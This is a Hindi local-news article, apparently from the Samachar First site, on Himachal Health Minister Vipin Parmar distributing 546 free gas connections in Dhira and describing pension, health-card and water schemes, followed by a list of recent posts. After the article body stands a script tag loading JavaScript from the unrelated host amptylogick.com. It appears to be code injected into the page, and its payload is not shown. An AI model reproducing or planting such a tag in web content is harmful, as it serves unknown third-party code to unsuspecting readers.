Categories: हिमाचल

स्वास्थ्य मंत्री विपिन परमार ने धीरा में वितरित किए फ्री गैस कनैक्शन

<p>स्वास्थ्य मंत्री विपिन सिंह परमार ने आज अपने विधानसभा क्षेत्र में धीरा में जन समस्याएं सुनी। उन्होंने 546 पात्र लाभार्थियों को फ्री गैस वितरण करने के उपरांत लोगों को संबोधित करते हुए कहा कि&nbsp; हिमाचल प्रदेश प्रत्येक परिवार को फ्री गैस कनैक्शन देने वाला देश का पहला राज्य होगा और इसमें एक फ्री रिफल भी देने का प्रावधान किया गया है। उन्होंने इससे पूर्व धीरा में ही 3 लाख से लगाये विद्युतिकृत नलकूप का लोकार्पण किया और 25 लाख रुपये की लागत से बनने वाले राजस्व सदन की अधारशिला भी रखी। हिमाचल गृहणी योजना में लगभग डेढ़ लाख पात्र लोगों को प्रदेश में फ्री गैस कनैक्शन दिये गयें हैं। जिला कांगड़ा में 34609 और सुलह विधान क्षेत्र में 3105 पात्र लोगों को निःशुल्क गैस कनैक्शन दिये गये हैं। उन्होंने विभाग को आदेश दिये कि यह सुनिश्चित किया जाये कि कोई भी परिवार बिना गैस कनैक्शन ना रहे।</p>

<p>उन्होंने कहा कि मुख्यमंत्री जय राम ठाकुर के नेतृत्व में सरकार हर वर्ग के विकास और उत्थान के लिए प्रतिबद्ध है। उन्होंने कहा कि प्रदेश के 70 साल आयु से अधिक आयु वाले सभी लोगों को समाजिक सुरक्षा पेंशन देने का फैसला लिया और वर्तमान सरकार ने 70 साल से अधिक आयु के लगभग डेढ़ लाख लोगों को पेंशन दी जा रही है। उन्होंने कहा कि सरकार ने निर्धन लोगों को 5 लाख रुपये की स्वास्थ्य सहायता उपलब्ध करवाई जा रही है। आयुष्मान योजना में प्रदेश के 38 हजार लोगों को स्वास्थ्य लाभ प्राप्त हुआ है। उन्होंने कहा कि प्रदेश के जो लोग आयुष्मान में कवर नहीं हुए हैं, उनके लिए प्रदेश सरकार ने हिमकेयर कार्ड बनायें और इसमें भी 5 लाख की स्वास्थ्य सहायता उपलब्ध करवाई जा रही है। प्रदेश में साढ़े 5 लाख लोग इससे जुड़े हैं। उन्होंने लोगों से आहवान किया जिनके हिमकेयर कार्ड़ नहीं बने हैं ऐसे सारे लोग जनवरी से मार्च 2019 तक अपने कार्ड बनवा सकते हैं।</p>

<p>परमार ने कहा कि गांव चौकी और क्यारवां के लिए जल जीवन मिशन के अंतर्गत 2 करोड़ 83 करोड रुपए की राशि से नई पेयजल योजना स्वीकृत की गई है। गांव सुनपुर लाहडू, पुड़बा और बलोटा के लिए 1 करोड़ 4 लाख पर की पेयजल योजना स्वीकृत की गई है। धीरा और आसपास के क्षेत्र में 40 नयें हैंडपंप लगाए गए हैं और इसमें 22 को विद्युतकृत किया गया है। पेयजल योजना परौर, खरोठ, झरेट, रझूं का निर्माण कार्य प्रगति पर है और इसपर 543 लाख व्यय किये जा रहे हैं। उठाऊ सिंचाई योजना नौरा पर 208 लाख, उठाऊ सिंचाई योजना पुड़बा पर 119 लाख और उठाऊ सिंचाई योजना पुड़बा-बलोटा पर 76 लाख रुपए व्यय किए जा रहे हैं।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

मनाली-लेह राजमार्ग (एनएच-03) यातायात की आवाजाही के लिए बहाल

बारालाचा दर्रा मार्ग का एक बड़ा हिस्सा बर्फ के कारण अभी वन-वे  दारचा से सरचू…

20 mins ago

बदलाव की ओर बढ़ रही है देश की जनताः नरेश चौहान

प्रधानमंत्री दस सालों का रिपोर्टकार्ड बताने के बजाए राम के नाम पर कर रहे हैं…

23 mins ago

बलद्वाड़ा के जंगल में लगी आग, जाइका और वन विभाग की टीम ने बुझाई

-हर रोज चीढ़ की पत्तियों में अग्निकांड की घटणा आ रही सामने -सीपीडी जाइका समीर…

27 mins ago

जनता पेयजल को तरसती रही, राजेंद्र राणा सरकार गिराने की साजिश रचते रहे

-मुख्यमंत्री सुखविंदर सुक्खू ने राणा की गृह पंचायत की पेयजल समस्या सुलझाई -कैप्टन रणजीत सिंह…

7 hours ago

सुजानपुर में भाजपा को कुनबा संभालना हो रहा मुश्किल

मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू की नीतियों में आस्था जता रहे भाजपाई  मतदान की तारीख…

7 hours ago

मुख्य निर्वाचन अधिकारी ने राज्य नोडल अधिकारियों के साथ की मीटिंग

मुख्य निर्वाचन अधिकारी, मनीष गर्ग ने आज यहां सभी राज्य नोडल अधिकारियों को चुनाव व्यय…

7 hours ago